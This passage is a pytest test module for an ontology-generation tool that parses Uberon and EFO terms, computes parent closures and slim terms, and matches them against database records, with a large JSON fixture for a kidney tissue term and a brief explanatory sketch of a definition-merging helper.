'develops_from': ['id7'],
'parents': ['id2'],
'all_parents': []
},
'id7': {
'term_id': 'id7',
'parents': ['d_term1'],
'all_parents': ['id6']
},
'id8': {
'term_id': 'id8',
'develops_from': ['id7', 'id3'],
'all_parents': ['id7', 'id3']
},
'id9': {
'term_id': 'id9',
'has_part_inverse': ['id3'],
'develops_from': ['id3'],
'all_parents': ['id10']
}
}
@pytest.fixture
def syn_uris():
return ['http://www.ebi.ac.uk/efo/alternative_term',
'http://www.geneontology.org/formats/oboInOwl#hasExactSynonym',
'http://purl.obolibrary.org/obo/IAO_0000118']
@pytest.fixture
def syn_uris_as_URIRef(syn_uris):
return [go.convert2namespace(uri) for uri in syn_uris]
def test_get_slim_terms(connection, slim_terms_by_ont):
present = ['developmental', 'assay']
absent = ['organ', 'system', 'cell']
test_slim_terms = slim_terms_by_ont
with mock.patch('encoded.commands.generate_ontology.search_metadata',
side_effect=test_slim_terms):
terms = go.get_slim_terms(connection)
assert len(terms) == 3
for term in terms:
assert term['is_slim_for'] in present
assert term['is_slim_for'] not in absent
def test_add_slim_to_term(terms_w_closures, slim_term_list):
slim_ids = ['a_term1', 'd_term1', 'a_term2']
for i, term in enumerate(terms_w_closures):
test_term = go.add_slim_to_term(term, slim_term_list)
assert test_term['term_id'] == str(i + 1)
if i < 2:
assert len(test_term['slim_terms']) == 1
assert test_term['slim_terms'][0] == slim_ids[i]
elif i <= 3:
assert len(test_term['slim_terms']) == 2
for t in test_term['slim_terms']:
assert t in slim_ids
elif i > 3:
assert 'slim_terms' not in test_term
def test_add_slim_terms(terms, slim_term_list):
terms = go.add_slim_terms(terms, slim_term_list)
print(terms)
for tid, term in terms.items():
if tid == 'id6':
assert len(term['slim_terms']) == 2
assert 'd_term1' in term['slim_terms']
assert 'a_term1' in term['slim_terms']
elif tid == 'id9':
assert 'slim_terms' not in term
else:
assert len(term['slim_terms']) == 1
if tid in ['a_term1', 'id2', 'id3', 'id4']:
assert term['slim_terms'][0] == 'a_term1'
elif tid in ['d_term1', 'id7', 'id8']:
assert term['slim_terms'][0] == 'd_term1'
def test_remove_obsoletes_and_unnamed_obsoletes(terms):
db_terms = []
terms['id10'] = {'term_id': 'id10', 'term_name': 'new_term that is deprecated'}
ids = ['a_term1', 'id2', 'id3', 'id4', 'd_term1', 'id6', 'id7', 'id8', 'id9', 'id10']
deprecated = 'id10'
for i in ids:
assert i in terms
terms = go.remove_obsoletes_and_unnamed(terms, deprecated, db_terms)
remaining = ids.pop(0)
assert remaining in terms
for i in ids:
assert i not in terms
def check_if_URIRef(uri):
return isinstance(uri, URIRef)
def test_convert2namespace(syn_uris):
for uri in syn_uris:
ns = go.convert2namespace(uri)
assert check_if_URIRef(ns)
assert str(ns) == uri
def test_get_syndef_terms_as_uri(syn_uris):
asrdf = [True, False]
for rdf in asrdf:
uris = go.get_syndef_terms_as_uri(all_ontology[2], 'synonym_terms', rdf)
if rdf:
for uri in uris:
assert check_if_URIRef(uri)
assert str(uri) in syn_uris
else:
assert all(str(uri) in syn_uris for uri in uris)
def test_get_synonym_term_uris_no_ontology():
with mock.patch('encoded.commands.generate_ontology.get_syndef_terms_as_uri',
return_value=[]):
synterms = go.get_synonym_term_uris('ontologys/FAKE')
assert not synterms
def test_get_definition_term_uris_no_ontology():
with mock.patch('encoded.commands.generate_ontology.get_syndef_terms_as_uri',
return_value=[]):
synterms = go.get_definition_term_uris('ontologys/FAKE')
assert not synterms
def test_get_synonym_term_uris(syn_uris, syn_uris_as_URIRef):
asrdf = [True, False]
with mock.patch('encoded.commands.generate_ontology.get_syndef_terms_as_uri',
return_value=syn_uris_as_URIRef):
for rdf in asrdf:
uris = go.get_synonym_term_uris('ontid', rdf)
if rdf:
for uri in uris:
assert check_if_URIRef(uri)
assert str(uri) in syn_uris
else:
assert all(str(uri) in syn_uris for uri in uris)
def test_get_definition_term_uris(syn_uris, syn_uris_as_URIRef):
asrdf = [True, False]
with mock.patch('encoded.commands.generate_ontology.get_syndef_terms_as_uri',
return_value=syn_uris_as_URIRef):
for rdf in asrdf:
uris = go.get_definition_term_uris('ontid', rdf)
if rdf:
for uri in uris:
assert check_if_URIRef(uri)
assert str(uri) in syn_uris
else:
assert all(str(uri) in syn_uris for uri in uris)
@pytest.yield_fixture
def owler():
with mock.patch.object(go, 'Owler') as mocked:
yield mocked
@pytest.fixture
def returned_synonyms():
return [
[], [],
['testsyn1'], ['testsyn1'],
['testsyn1', 'testsyn2'], ['testsyn1', 'testsyn2']
]
def test_get_synonyms_and_definitions(owler, returned_synonyms):
checks = ['testsyn1', 'testsyn2']
with mock.patch('encoded.commands.generate_ontology.getObjectLiteralsOfType',
side_effect=returned_synonyms):
class_ = 'test_class'
synonym_terms = ['1']
definition_terms = ['1']
for i in range(int(len(returned_synonyms) / 2)):
synonyms = go.get_synonyms(class_, owler, synonym_terms)
definitions = go.get_definitions(class_, owler, definition_terms)
assert synonyms == definitions
if i == 0:
assert not synonyms
else:
assert len(synonyms) == i
for syn in synonyms:
assert syn in checks
def test_iterative_parents(terms):
for tid, term in terms.items():
parents = []
oks = []
if 'all_parents' in term:
parents = go.iterative_parents(term['all_parents'], terms, 'all_parents')
if tid in ['a_term1', 'id6', 'id9']:
assert not parents
if tid == 'id2':
oks = ['a_term1']
assert len(parents) == 1
if tid in ['id3', 'id4']:
oks = ['a_term1', 'id2']
assert len(parents) == 2
if tid == 'd_term1':
oks = ['a_term1', 'id2', 'id4']
assert len(parents) == 3
if tid == 'id7':
oks = ['id6']
assert len(parents) == 1
if tid == 'id8':
oks = ['id6', 'id7', 'a_term1', 'id2', 'id3']
assert len(parents) == 5
if oks:
assert all(_id in oks for _id in parents)
def test_get_all_ancestors(terms):
for tid, term in terms.items():
term['development'] = term['all_parents'].copy() # adding development to all terms
for tid, term in terms.items():
term = go.get_all_ancestors(term, terms, 'all_parents')
term = go.get_all_ancestors(term, terms, 'development')
# check they're the same - no need to check both anymore
assert term['closure'] == term['closure_with_develops_from']
closure = term['closure']
okids = []
assert tid in closure # checks that the term id is included
if tid in ['a_term1', 'id6', 'id9']:
assert len(closure) == 1
if tid in ['id2', 'id7']:
assert len(closure) == 2
if tid == 'id2':
okids = ['a_term1']
else:
okids = ['id6']
if tid in ['id3', 'id4']:
assert len(closure) == 3
okids = ['a_term1', 'id2']
if tid == 'd_term1':
assert len(closure) == 4
okids = ['a_term1', 'id2', 'id4']
if tid == 'id8':
assert len(closure) == 6
okids = ['id6', 'id7', 'a_term1', 'id2', 'id3']
if okids:
assert all(_id in okids for _id in closure)
def test_combine_all_parents_w_no_parents():
term = {'term_id': 'id1'}
term = go._combine_all_parents(term)
assert not term['all_parents'] # both should be empty lists
assert not term['development']
def test_combine_all_parents_w_empty_parents():
term = {'term_id': 'id1', 'parents': [], 'relationships': [],
'develops_from': [], 'has_part_inverse': []}
term = go._combine_all_parents(term)
assert not term['all_parents'] # both should be empty lists
assert not term['development']
def test_combine_all_parents_w_one_parent():
term = {'term_id': 'id1', 'parents': ['id2'], 'relationships': [],
'develops_from': [], 'has_part_inverse': []}
term = go._combine_all_parents(term)
assert len(term['all_parents']) == 1
assert term['all_parents'][0] == 'id2'
assert term['development'] == term['all_parents']
def test_combine_all_parents_w_two_parents():
term = {'term_id': 'id1', 'parents': ['id2', 'id3'], 'relationships': [],
'develops_from': [], 'has_part_inverse': []}
term = go._combine_all_parents(term)
assert len(term['all_parents']) == 2
assert 'id2' in term['all_parents']
assert 'id3' in term['all_parents']
assert sorted(term['development']) == sorted(term['all_parents'])
def test_combine_all_parents_w_two_same_parents():
term = {'term_id': 'id1', 'parents': ['id2', 'id2'], 'relationships': [],
'develops_from': [], 'has_part_inverse': []}
term = go._combine_all_parents(term)
assert len(term['all_parents']) == 1
assert term['all_parents'][0] == 'id2'
assert term['development'] == term['all_parents']
def test_combine_all_parents_w_parent_and_relationship_diff():
term = {'term_id': 'id1', 'parents': ['id2'], 'relationships': ['id3'],
'develops_from': [], 'has_part_inverse': []}
term = go._combine_all_parents(term)
assert len(term['all_parents']) == 2
assert 'id2' in term['all_parents']
assert 'id3' in term['all_parents']
assert sorted(term['development']) == sorted(term['all_parents'])
def test_combine_all_parents_w_parent_and_relationship_same():
term = {'term_id': 'id1', 'parents': ['id2'], 'relationships': ['id2'],
'develops_from': [], 'has_part_inverse': []}
term = go._combine_all_parents(term)
assert len(term['all_parents']) == 1
assert term['all_parents'][0] == 'id2'
assert term['development'] == term['all_parents']
def test_combine_all_parents_w_parent_and_develops_from_diff():
term = {'term_id': 'id1', 'parents': ['id2'], 'relationships': [],
'develops_from': ['id3'], 'has_part_inverse': []}
term = go._combine_all_parents(term)
assert len(term['all_parents']) == 1
assert len(term['development']) == 2
assert term['all_parents'][0] == 'id2'
assert 'id2' in term['development']
assert 'id3' in term['development']
def test_combine_all_parents_w_parent_and_develops_from_same():
term = {'term_id': 'id1', 'parents': ['id2'], 'relationships': [],
'develops_from': ['id2'], 'has_part_inverse': []}
term = go._combine_all_parents(term)
assert len(term['all_parents']) == 1
assert term['all_parents'][0] == 'id2'
assert term['development'] == term['all_parents']
def test_combine_all_parents_w_only_develops_from():
term = {'term_id': 'id1', 'parents': [], 'relationships': [],
'develops_from': ['id2'], 'has_part_inverse': []}
term = go._combine_all_parents(term)
assert not term['all_parents']
assert len(term['development']) == 1
assert term['development'][0] == 'id2'
def test_combine_all_parents_w_has_part_inverse_only():
term = {'term_id': 'id1', 'parents': [], 'relationships': [],
'develops_from': [], 'has_part_inverse': ['id2']}
term = go._combine_all_parents(term)
assert not term['all_parents'] # both should be empty lists
assert not term['development']
def test_combine_all_parents_w_has_part_inverse_to_exclude():
term = {'term_id': 'id1', 'parents': [], 'relationships': [],
'develops_from': ['id2'], 'has_part_inverse': ['id2']}
term = go._combine_all_parents(term)
assert not term['all_parents'] # both should be empty lists
assert not term['development']
def test_combine_all_parents_w_has_part_inverse_to_exclude_plus_others():
term = {'term_id': 'id1', 'parents': ['id2'], 'relationships': [],
'develops_from': ['id3', 'id4', 'id5'], 'has_part_inverse': ['id4', 'id5', 'id6']}
term = go._combine_all_parents(term)
assert len(term['all_parents']) == 1
assert len(term['development']) == 2
assert term['all_parents'][0] == 'id2'
assert 'id2' in term['development']
assert 'id3' in term['development']
def test_has_human_empty():
ll = []
assert not go._has_human(ll)
def test_has_human_no_human():
ll = ['http://purl.obolibrary.org/obo/BFO_0000051']
assert not go._has_human(ll)
def test_has_human_human():
ll = ['http://purl.obolibrary.org/obo/BFO_0000051', 'http://purl.obolibrary.org/obo/NCBITaxon_9606']
assert go._has_human(ll)
def test_has_human_uriref_human():
uri = 'http://purl.obolibrary.org/obo/NCBITaxon_9606'
uri = go.convert2URIRef(uri)
ll = [uri]
assert go._has_human(ll)
def test_get_termid_from_uri_no_uri():
uri = ''
assert not go.get_termid_from_uri(uri)
def test_get_termid_from_uri_valid_uri():
uri = 'http://www.ebi.ac.uk/efo/EFO_0002784'
tid = go.get_termid_from_uri(uri)
assert tid == 'EFO:0002784'
def test_get_termid_from_uri_funky_uri1():
uri = 'http://www.ebi.ac.uk/efo/EFO_UFO_0002784'
tid = go.get_termid_from_uri(uri)
assert tid == 'EFO:UFO:0002784'
def test_get_termid_from_uri_funky_uri2():
uri = 'http://www.ebi.ac.uk/efo/EFO0002784'
tid = go.get_termid_from_uri(uri)
assert tid == 'EFO0002784'
@pytest.fixture
def uberon_owler():
return Owler('src/encoded/tests/data/documents/test_uberon.owl')
@pytest.fixture
def uberon_owler2():
return Owler('src/encoded/tests/data/documents/test_uberon2.owl')
@pytest.fixture
def uberon_owler3():
return Owler('src/encoded/tests/data/documents/test_uberon3.owl')
@pytest.fixture
def uberon_owler4():
return Owler('src/encoded/tests/data/documents/test_uberon4.owl')
@pytest.fixture
def ll_class():
return go.convert2URIRef('http://purl.obolibrary.org/obo/UBERON_0000101')
def test_get_term_name_from_rdf_no_name(uberon_owler):
name = go.get_term_name_from_rdf('pickle', uberon_owler)
assert not name
def test_get_term_name_from_rdf_has_name(uberon_owler, ll_class):
name = go.get_term_name_from_rdf(ll_class, uberon_owler)
assert name == 'lobe of lung'
def test_get_term_name_from_rdf_no_term(uberon_owler):
class_ = go.convert2URIRef('http://purl.obolibrary.org/obo/UBERON_0000001')
name = go.get_term_name_from_rdf(class_, uberon_owler)
assert not name
def test_create_term_dict(ll_class, uberon_owler):
with mock.patch('encoded.commands.generate_ontology.get_term_name_from_rdf',
return_value='lung lobe'):
term = go.create_term_dict(ll_class, 'termid', uberon_owler, 'ontid')
assert term['term_name'] == 'lung lobe'
assert term['term_id'] == 'termid'
assert 'ontid' in term['source_ontologies']
assert term['namespace'] == 'http://purl.obolibrary.org/obo'
assert term['term_url'] == 'http://purl.obolibrary.org/obo/UBERON_0000101'
def test_add_term_and_info(uberon_owler2):
testid = 'UBERON:0001772'
relid = 'UBERON:0010304'
for c in uberon_owler2.allclasses:
if go.isBlankNode(c):
test_class = c
parent = go.convert2URIRef('http://purl.obolibrary.org/obo/UBERON_0001772')
terms = go._add_term_and_info(test_class, parent, 'test_rel', uberon_owler2, {})
assert testid in terms
term = terms[testid]
assert term['term_id'] == testid
assert relid in term['test_rel']
def test_process_intersection_of(uberon_owler3):
terms = {}
for c in uberon_owler3.allclasses:
for i in uberon_owler3.rdfGraph.objects(c, go.IntersectionOf):
terms = go.process_intersection_of(c, i, uberon_owler3, terms)
assert len(terms) == 1
term = list(terms.values())[0]
assert len(term['relationships']) == 1
assert term['relationships'][0] == 'UBERON:1'
assert len(term['develops_from']) == 1
assert term['develops_from'][0] == 'UBERON:2'
def test_process_blank_node(uberon_owler3):
terms = {}
for c in uberon_owler3.allclasses:
terms = go.process_blank_node(c, uberon_owler3, terms)
assert len(terms) == 1
assert 'UBERON:0001772' in terms
def test_find_and_add_parent_of(uberon_owler4):
tid = 'CL:0002553'
terms = {tid: {'term_id': tid}}
relids = ['UBERON:0002048', 'OBI:0000456', 'CL:0000058', 'CL:0000133']
relation = None
seen = False
for c in uberon_owler4.allclasses:
for _, p in enumerate(uberon_owler4.get_classDirectSupers(c, excludeBnodes=False)):
if go.isBlankNode(p):
has_part = False
if not seen:
has_part = True
seen = True
terms = go._find_and_add_parent_of(p, c, uberon_owler4, terms, has_part, relation)
assert len(terms) == 2
print(terms)
for termid, term in terms.items():
if termid == tid:
assert len(term['relationships']) == 3
for t in term['relationships']:
assert t in relids
else:
assert termid in relids
assert len(term['has_part_inverse']) == 1
assert term['has_part_inverse'][0] == tid
def test_process_parents(uberon_owler4):
tids = ['CL:0002553', 'CL:0000058']
relids = ['OBI:0000456', 'UBERON:0002048']
terms = {tids[0]: {'term_id': tids[0]}}
for c in uberon_owler4.allclasses:
terms = go.process_parents(c, uberon_owler4, terms)
print(terms)
assert len(terms) == 2
term1 = terms[tids[0]]
term2 = terms[tids[1]]
assert term1['develops_from'][0] == 'CL:0000133'
assert term1['parents'][0] == 'UBERON:0010313'
assert len(term1['relationships']) == 2
for r in relids:
assert r in term1['relationships']
assert term2['has_part_inverse'][0] == tids[0]
@pytest.fixture
def terms_w_stuff():
return {
'term1': {
'term_id': 't1',
'term_name': 'term1',
'relationships': ['rel1', 'rel2'],
'all_parents': ['p'],
'development': 'd',
'has_part_inverse': [],
'develops_from': '',
'part_of': ['p1'],
'closure': [],
'closure_with_develops_from': None
},
'term2': {
'term_id': 't1',
'term_name': 'term1'
},
'term3': {},
'term4': None
}
def test_cleanup_non_fields(terms_w_stuff):
to_delete = ['relationships', 'all_parents', 'development',
'has_part_inverse', 'develops_from', 'part_of',
'closure', 'closure_with_develops_from']
to_keep = ['term_id', 'term_name']
for d in to_delete + to_keep:
assert d in terms_w_stuff['term1']
terms = go._cleanup_non_fields(terms_w_stuff)
assert len(terms) == 2
assert terms['term1'] == terms['term2']
for d in to_delete:
assert d not in terms['term1']
for k in to_keep:
assert k in terms['term1']
@pytest.yield_fixture
def mock_get_synonyms():
syn_lists = [[], ['syn1'], ['syn1', 'syn2']]
with mock.patch('encoded.commands.generate_ontology.get_synonyms', side_effect=syn_lists) as mocked:
yield mocked
@pytest.yield_fixture
def mock_get_definitions():
def_lists = [[], ['def1'], ['def1', 'def2']]
with mock.patch('encoded.commands.generate_ontology.get_synonyms', side_effect=def_lists) as mocked:
yield mocked
@pytest.fixture
def simple_terms():
terms = {'t1': {'term_id': 't1', 'term_url': 'term1'},
't2': {'term_id': 't2', 'term_url': 'term2'},
't3': {'term_id': 't3', 'term_url': 'term3'}}
return OrderedDict(sorted(terms.items(), key=lambda t: t[0]))
def test_add_additional_term_info(simple_terms):
syn_lists = [[], ['syn1'], ['syn1', 'syn2']]
def_lists = [[], ['def1'], ['def1', 'def2']]
# terms = {'t1': {'term_id': 't1', 'term_url': 'term1'},
# 't2': {'term_id': 't2', 'term_url': 'term2'},
# 't3': {'term_id': 't3', 'term_url': 'term3'}}
# terms = OrderedDict(sorted(terms.items(), key=lambda t: t[0]))
with mock.patch('encoded.commands.generate_ontology.convert2URIRef', return_value='blah'):
with mock.patch('encoded.commands.generate_ontology.get_synonyms', side_effect=syn_lists):
with mock.patch('encoded.commands.generate_ontology.get_definitions', side_effect=def_lists):
result = go.add_additional_term_info(simple_terms, 'data', 'synterms', 'defterms')
for tid, term in result.items():
if tid == 't3':
assert 'UNK' in term['definitions']
assert 'def1' in term['definitions']['UNK']
assert 'def2' in term['definitions']['UNK']
assert len(term['synonyms']) == 2
assert 'syn1' in term['synonyms']
assert 'syn2' in term['synonyms']
elif tid == 't2':
assert 'UNK' in term['definitions']
assert 'def1' in term['definitions']['UNK']
assert len(term['synonyms']) == 1
assert term['synonyms'][0] == 'syn1'
else:
assert 'synonyms' not in term
assert 'definition' not in term
def test_write_outfile_pretty(simple_terms):
filename = 'tmp_test_file'
go.write_outfile(list(simple_terms.values()), filename, pretty=True)
infile = open(filename, 'r')
result = json.load(infile)
print(result)
for r in result:
assert r in simple_terms.values()
os.remove(filename)
def test_write_outfile_notpretty(simple_terms):
print(simple_terms)
filename = 'tmp_test_file'
go.write_outfile(list(simple_terms.values()), filename)
with open(filename, 'r') as infile:
for l in infile:
result = json.loads(l)
for v in simple_terms.values():
assert v in result
os.remove(filename)
@pytest.fixture
def ontology_list():
return [
{'uuid': '1', 'ontology_name': 'ont1', 'ontology_prefix': 'TO'},
{'uuid': '2', 'ontology_name': 'ont2', 'ontology_prefix': 'NN'}
]
@pytest.fixture
def matches(ontology_list):
return [
{'term_id': 'TO:t1', 'a': 1, 'b': 2, 'c': 3, 'source_ontologies': [ontology_list[0].get('uuid')]},
{'term_id': 'TO:t1', 'a': 1, 'b': 2, 'c': 3, 'source_ontologies': [ontology_list[0].get('uuid')]}
]
def test_terms_match_identical(matches):
assert go._terms_match(matches[0], matches[1])
def test_terms_match_w_parents(matches):
t1 = matches[0]
t2 = matches[1]
p1 = ['OBI:01', 'EFO:01']
p2 = [{'@id': '/ontology-terms/OBI:01/', 'display_title': 'blah'},
{'@id': '/ontology-terms/EFO:01/', 'display_title': 'hah'}]
t1['parents'] = p1
t2['parents'] = p2
assert go._terms_match(t1, t2)
def test_terms_match_unmatched_parents_1(matches):
t1 = matches[0]
t2 = matches[1]
p1 = ['OBI:01', 'EFO:01']
p2 = [{'@id': '/ontology-terms/OBI:01/', 'display_title': 'blah'}]
t1['parents'] = p1
t2['parents'] = p2
assert not go._terms_match(t1, t2)
def test_terms_match_unmatched_parents_2(matches):
t1 = matches[0]
t2 = matches[1]
p1 = ['OBI:01', 'EFO:01']
p2 = [{'@id': '/ontology-terms/OBI:01/', 'display_title': 'blah'},
{'@id': '/ontology-terms/EFO:02/', 'display_title': 'hah'}]
t1['parents'] = p1
t2['parents'] = p2
assert not go._terms_match(t1, t2)
def test_terms_match_w_ontology(matches):
t1 = matches[0]
t2 = matches[1]
o1 = '530016bc-8535-4448-903e-854af460b254'
o2 = {'@id': '/ontologys/530016bc-8535-4448-903e-854af460b254/', 'display_title': 'blah'}
t1['source_ontologies'] = [o1]
t2['source_ontologies'] = [o2]
assert go._terms_match(t1, t2)
@pytest.fixture
def ont_terms(matches, ontology_list):
t2 = matches[1]
t2['term_id'] = 'TO:t2'
t2['parents'] = ['OBI:01', 'EFO:01']
return {
'TO:t1': matches[0],
'TO:t2': t2,
'NN:t3': {'term_id': 'NN:t3', 'x': 7, 'y': 8, 'z': 9, 'source_ontologies': [ontology_list[1]]}
}
@pytest.fixture
def db_terms(ont_terms):
db_terms = ont_terms.copy()
db_terms['TO:t1']['uuid'] = '1234'
db_terms['TO:t2']['uuid'] = '5678'
del db_terms['TO:t2']['parents']
del db_terms['NN:t3']
for v in db_terms.values():
v.update({'status': 'released'})
return db_terms
def test_id_post_and_patch_filter(ont_terms, db_terms, ontology_list):
result = go.id_post_and_patch(ont_terms, db_terms, ontology_list)
assert len(result) == 1
assert 'NN:t3' == result[0].get('term_id')
# assert len(idmap) == 3
# for k, v in idmap.items():
# assert k in ['t1', 't2', 't3']
# if k != 't3': # t1 and t2 already had uuids
# assert v in ['1234', '5678']
def test_id_post_and_patch_no_filter(ont_terms, db_terms, ontology_list):
tids = ['TO:t1', 'TO:t2', 'NN:t3']
result = go.id_post_and_patch(ont_terms, db_terms, ontology_list, False)
assert len(result) == 3
for t in result:
# assert t.get('term_id') in idmap
assert t.get('term_id') in tids
def test_id_post_and_patch_id_obs(ont_terms, db_terms, ontology_list):
db_terms['TO:t4'] = {
'term_id': 'TO:t4',
'source_ontologies': [{'uuid': '1', 'ontology_name': 'ont1', 'ontology_prefix': 'TO'}],
'uuid': '7890',
'status': 'released'}
result = go.id_post_and_patch(ont_terms, db_terms, ontology_list)
assert len(result) == 2
assert '7890' in [t.get('uuid') for t in result]
# assert 't4' in idmap
def test_id_post_and_patch_id_obs_simple(ont_terms, db_terms, ontology_list):
db_terms['TO:t4'] = {
'term_id': 'TO:t4',
'source_ontologies': [{'uuid': '1', 'ontology_name': 'ont1', 'ontology_prefix': 'TO'}],
'uuid': '7890',
'status': 'released'}
result = go.id_post_and_patch(ont_terms, db_terms, ontology_list, ontarg='1', simple=True)
assert len(result) == 2
assert '7890' in [t.get('uuid') for t in result]
def test_id_post_and_patch_donot_obs(ont_terms, db_terms, ontology_list):
db_terms['t4'] = {'term_id': 't4', 'source_ontologies': {'uuid': '1', 'ontology_name': 'ont1'}, 'uuid': '7890'}
result = go.id_post_and_patch(ont_terms, db_terms, ontology_list, True, False)
assert 't4' not in [t.get('term_id') for t in result]
# assert 't4' not in idmap
# def test_id_post_and_patch_ignore_4dn(ont_terms, db_terms, ontology_list):
# db_terms['t4'] = {'term_id': 't4', 'source_ontologies': {'uuid': '4', 'ontology_name': '4DN ont'}, 'uuid': '7890'}
# result = go.id_post_and_patch(ont_terms, db_terms, ontology_list)
# print(result)
# assert 't4' not in [t.get('term_id') for t in result]
# # assert 't4' not in idmap
def valid_uuid(uid):
validchars = '0123456789abcdef'
uid = uid.replace('-', '')
if len(uid) != 32:
return False
for c in uid:
if c not in validchars:
return False
return True
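# Illustrative examples for the helper above (added for clarity; not part of the original
# test module). valid_uuid expects 32 lowercase hex characters once hyphens are stripped.
def _valid_uuid_examples():
    assert valid_uuid('530016bc-8535-4448-903e-854af460b254')      # canonical lowercase UUID
    assert not valid_uuid('530016bc-8535-4448-903e')               # too short after stripping hyphens
    assert not valid_uuid('530016BC-8535-4448-903e-854af460b254')  # uppercase hex is rejected by this helper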
@pytest.fixture
def embedded_dbterm():
return {
"synonyms": [
"renal pelvis uroepithelium",
"renal pelvis transitional epithelium",
"pelvis of ureter uroepithelium",
"renal pelvis urothelium",
"kidney pelvis uroepithelium",
"uroepithelium of pelvis of ureter",
"urothelium of pelvis of ureter",
"uroepithelium of kidney pelvis",
"transitional epithelium of kidney pelvis",
"transitional epithelium of renal pelvis",
"urothelium of kidney pelvis",
"uroepithelium of renal pelvis",
"urothelium of renal pelvis",
"kidney pelvis transitional epithelium",
"pelvis of ureter urothelium"
],
"preferred_name": "kidney pelvis urothelium",
"references": [
],
"external_references": [
],
"status": "released",
"term_name": "kidney pelvis urothelium",
"submitted_by": {
"principals_allowed": {
"edit": [
"group.admin",
"userid.986b362f-4eb6-4a9c-8173-3ab267307e3a"
],
"view": [
"group.admin",
"group.read-only-admin",
"remoteuser.EMBED",
"remoteuser.INDEXER",
"userid.986b362f-4eb6-4a9c-8173-3ab267307e3a"
]
},
"@id": "/users/986b362f-4eb6-4a9c-8173-3ab267307e3a/",
"@type": [
"User",
"Item"
],
"uuid": "986b362f-4eb6-4a9c-8173-3ab267307e3a",
"display_title": "4dn DCIC"
},
"display_title": "kidney pelvis urothelium",
"schema_version": "1",
"@type": [
"OntologyTerm",
"Item"
],
"parents": [
{
"principals_allowed": {
"edit": [
"group.admin"
],
"view": [
"system.Everyone"
]
},
"@id": "/ontology-terms/UBERON:0001254/",
"@type": [
"OntologyTerm",
"Item"
],
"uuid": "38dbff69-aac7-46a4-837e-7340c2c5bcd5",
"display_title": "urothelium of ureter"
},
{
"principals_allowed": {
"edit": [
"group.admin"
],
"view": [
"system.Everyone"
]
},
"@id": "/ontology-terms/UBERON:0004819/",
"@type": [
"OntologyTerm",
"Item"
],
"uuid": "57ac2905-0533-43c9-988b-9add8c225a78",
"display_title": "kidney epithelium"
}
],
"date_created": "2017-05-11T16:00:51.747446+00:00",
"term_id": "UBERON:0004788",
"source_ontology": {
"uuid": "530016bc-8535-4448-903e-854af460b254",
"display_title": "Uberon",
"principals_allowed": {
"edit": [
"group.admin"
],
"view": [
"system.Everyone"
]
},
"@id": "/ontologys/530016bc-8535-4448-903e-854af460b254/",
"@type": [
"Ontology",
"Item"
],
"ontology_name": "Uberon"
},
"uuid": "e5e1690a-1a80-4e50-a3cf-58f2f269abd8",
"term_url": "http://purl.obolibrary.org/obo/UBERON_0004788",
"last_modified": {
"date_modified": "2018-07-11T05:05:30.826642+00:00",
"modified_by": {
"principals_allowed": {
"edit": [
"group.admin",
"userid.986b362f-4eb6-4a9c-8173-3ab267307e3a"
],
"view": [
"group.admin",
"group.read-only-admin",
"remoteuser.EMBED",
"remoteuser.INDEXER",
"userid.986b362f-4eb6-4a9c-8173-3ab267307e3a"
]
},
"@id": "/users/986b362f-4eb6-4a9c-8173-3ab267307e3a/",
"@type": [
"User",
"Item"
],
"uuid": "986b362f-4eb6-4a9c-8173-3ab267307e3a",
"display_title": "4dn DCIC"
}
},
"principals_allowed": {
"edit": [
"group.admin"
],
"view": [
"system.Everyone"
]
},
"@id": "/ontology-terms/UBERON:0004788/",
"slim_terms": [
{
"principals_allowed": {
"edit": [
"group.admin"
],
"view": [
"system.Everyone"
]
},
"term_name": "endoderm",
"display_title": "endoderm",
"is_slim_for": "developmental",
"@id": "/ontology-terms/UBERON:0000925/",
"@type": [
"OntologyTerm",
"Item"
],
"uuid": "111121bc-8535-4448-903e-854af460a233"
},
{
"principals_allowed": {
"edit": [
"group.admin"
],
"view": [
"system.Everyone"
]
},
"term_name": "kidney",
"display_title": "kidney",
"is_slim_for": "organ",
"@id": "/ontology-terms/UBERON:0002113/",
"@type": [
"OntologyTerm",
"Item"
],
"uuid": "111167bc-8535-4448-903e-854af460a233"
},
{
"principals_allowed": {
"edit": [
"group.admin"
],
"view": [
"system.Everyone"
]
},
"term_name": "ureter",
"display_title": "ureter",
"is_slim_for": "organ",
"@id": "/ontology-terms/UBERON:0000056/",
"@type": [
"OntologyTerm",
"Item"
],
"uuid": "111148bc-8535-4448-903e-854af460a233"
},
{
"principals_allowed": {
"edit": [
"group.admin"
],
"view": [
"system.Everyone"
]
},
"term_name": "renal system",
"display_title": "renal system",
"is_slim_for": "system",
"@id": "/ontology-terms/UBERON:0001008/",
"@type": [
"OntologyTerm",
"Item"
],
"uuid": "111130bc-8535-4448-903e-854af460a233"
},
{
"principals_allowed": {
"edit": [
"group.admin"
],
"view": [
"system.Everyone"
]
},
"term_name": "mesoderm",
"display_title": "mesoderm",
"is_slim_for": "developmental",
"@id": "/ontology-terms/UBERON:0000926/",
"@type": [
"OntologyTerm",
"Item"
],
"uuid": "111120bc-8535-4448-903e-854af460a233"
}
],
"namespace": "http://purl.obolibrary.org/obo",
"definition": "the epithelial lining of the luminal space of the kidney pelvis"
}
def test_get_raw_form(embedded_dbterm):
raw_term = go.get_raw_form(embedded_dbterm)
print(raw_term)
def test_update_definition():
prefix = 'EFO'
tdef = 'here is EFO definition (EFO)'
dbdef = 'here is outdated definition (EFO, OBI) and another def (SO)'
newdef = go.update_definition(tdef, dbdef, prefix)
assert tdef in newdef
assert 'here is outdated definition (EFO, OBI)' not in newdef
```
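The last test above pins down the observable contract of `go.update_definition`: the refreshed, prefix-tagged definition must appear in the result, while the stale definition attributed to that prefix is dropped and definitions from other sources are kept. The snippet below is a minimal sketch of one way to satisfy that contract; it is an illustration only, not the project's implementation, and the "(PREFIX)"-tag parsing and the ' and ' segment separator are assumptions taken from the test data.

```python
import re


def update_definition_sketch(newdef, olddef, prefix):
    """Illustrative only: merge a refreshed, prefix-tagged definition into an existing one.

    Segments of the old definition are assumed to be joined by ' and ' and tagged with
    their source ontologies in trailing parentheses, e.g. '... (EFO, OBI)'. Segments
    attributed to `prefix` are dropped; everything else is kept after the new definition.
    """
    kept = []
    for segment in re.split(r'\s+and\s+', olddef):
        tags = re.findall(r'\(([^)]*)\)', segment)
        if not tags or prefix not in tags[-1]:
            kept.append(segment)
    return ' and '.join([newdef] + kept)


# Mirrors the assertions in test_update_definition above:
# update_definition_sketch('here is EFO definition (EFO)',
#                          'here is outdated definition (EFO, OBI) and another def (SO)',
#                          'EFO')
# == 'here is EFO definition (EFO) and another def (SO)'
```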
#### File: encoded/tests/test_permissions.py
```python
import pytest
import webtest
from datetime import date
from urllib.parse import urlencode
from ..types.lab import Lab
